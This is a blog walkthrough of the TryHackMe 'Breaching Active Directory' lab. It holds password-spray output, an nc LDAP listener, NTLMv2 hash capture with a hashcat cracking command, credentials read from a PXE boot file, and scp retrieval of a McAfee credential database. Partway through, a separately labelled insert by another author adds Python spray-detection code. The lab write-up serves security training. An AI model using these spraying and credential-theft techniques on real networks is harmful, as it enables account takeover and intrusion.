
Training Update v0.112


It’s Friday and we are back with another room from THM!

Today we take on the Breaching Active Directory room, which is part of the CompTIA Pentest+ pathway that we are now coming to the end of on THM!


sed -i '1s|^|nameserver 10.200.26.101\n|'

[*] Starting passwords spray attack using the following password: Changeme123
[-] Failed login with Username: anthony.reynolds
[-] Failed login with Username: samantha.thompson
[-] Failed login with Username: dawn.turner
[-] Failed login with Username: frances.chapman
[-] Failed login with Username: henry.taylor
[-] Failed login with Username: jennifer.wood
[+] Valid credential pair found! Username: hollie.powell Password: Changeme123
[-] Failed login with Username: louise.talbot
[+] Valid credential pair found! Username: heather.smith Password: Changeme123
[-] Failed login with Username: dominic.elliott
[+] Valid credential pair found! Username: gordon.stevens Password: Changeme123
[-] Failed login with Username: alan.jones
[-] Failed login with Username: frank.fletcher
[-] Failed login with Username: maria.sheppard
[-] Failed login with Username: sophie.blackburn
[-] Failed login with Username: dawn.hughes
[-] Failed login with Username: henry.black
[-] Failed login with Username: joanne.davies
[-] Failed login with Username: mark.oconnor
[+] Valid credential pair found! Username: georgina.edwards Password: Changeme123
[*] Password spray attack completed, 4 valid credential pairs found
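
Added example (my own code, not part of the original post or the THM room): the spray output above replayed as the logon events a domain controller would record, with a simple detection rule that flags a source failing against many distinct accounts in a short window and lists the accounts whose password it guessed. The source IP, timestamps and event tuple format are assumptions.

```python
import re
from collections import defaultdict

# Constructed sample modelled on the spray tool output above (a subset of the lines).
SPRAY_OUTPUT = """\
[-] Failed login with Username: anthony.reynolds
[-] Failed login with Username: samantha.thompson
[-] Failed login with Username: dawn.turner
[+] Valid credential pair found! Username: hollie.powell Password: Changeme123
[-] Failed login with Username: louise.talbot
[+] Valid credential pair found! Username: heather.smith Password: Changeme123
[-] Failed login with Username: dominic.elliott
[+] Valid credential pair found! Username: gordon.stevens Password: Changeme123
"""

# "[-]" is a failed logon, "[+]" a successful one; the username follows "Username:".
LINE_RE = re.compile(r"^\[([-+])\] .*?Username: (\S+)")


def to_logon_events(text, source="10.50.0.5", start_ts=0, gap=2):
    """Turn each spray line into a (timestamp, source, user, success) event.

    Source IP and timestamps are assumed: one source, one attempt every `gap` seconds,
    which is what the DC-side 4625/4624 stream for a spray looks like."""
    events = []
    for i, line in enumerate(text.splitlines()):
        m = LINE_RE.match(line)
        if m:
            events.append((start_ts + i * gap, source, m.group(2), m.group(1) == "+"))
    return events


def detect_spray(events, min_users=5, window=60):
    """Flag each source with failed logons against >= min_users distinct accounts
    inside `window` seconds. Returns {source: {"failed_users": [...], "compromised": [...]}};
    "compromised" lists accounts that later succeeded from that source (reset these)."""
    by_source = defaultdict(list)
    for ev in sorted(events):
        by_source[ev[1]].append(ev)
    alerts = {}
    for src, evs in by_source.items():
        failed = [(ts, user) for ts, _, user, ok in evs if not ok]
        succeeded = sorted({user for _, _, user, ok in evs if ok})
        for i, (ts, _) in enumerate(failed):
            # sliding window starting at this failure: distinct accounts hit within `window`
            distinct = {u for t, u in failed[i:] if t - ts <= window}
            if len(distinct) >= min_users:
                alerts[src] = {"failed_users": sorted(distinct), "compromised": succeeded}
                break
    return alerts
```

With the constructed sample, five distinct accounts fail from 10.50.0.5 within 12 seconds, so the source is flagged and the three accounts that accepted Changeme123 are listed for reset.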

http://printer.za.tryhackme.com/settings.aspx


Got an error –

nc -lvnp 389
nc: Address already in use


sudo tcpdump -SX -i breachad tcp port 389


Password – tryhackmeldappass1@


[SMB] NTLMv2-SSP Client : ::ffff:10.200.26.202
[SMB] NTLMv2-SSP Username : ZA\svcFileCopy
[SMB] NTLMv2-SSP Hash : svcFileCopy::ZA:3c1ddc933951f72e[hash truncated]

hashcat -m 5600 hash.txt passwordlist-1647876320267.txt --force


Password – FPassword1!


http://pxeboot.za.tryhackme.com/

>>>> Finding Bootstrap.ini 
>>>> >>>> DeployRoot = \\THMMDT\MTDBuildLab$ 
>>>> >>>> UserID = svcMDT
>>>> >>>> UserDomain = ZA
>>>> >>>> UserPassword = PXEBootSecure1@

scp [email protected]:C:/ProgramData/McAfee/Agent/DB/ma.db .


This was erroring out a lot –


We now know the svcAV user’s password is MyStrongPassword!.


Now we move on to the Lateral Movement and Pivoting room on THM!


Need to do more research, can’t understand why it’s not working.

Will continue tomorrow/Monday!


Until next time & don’t sleepwalk through life!

Alu a e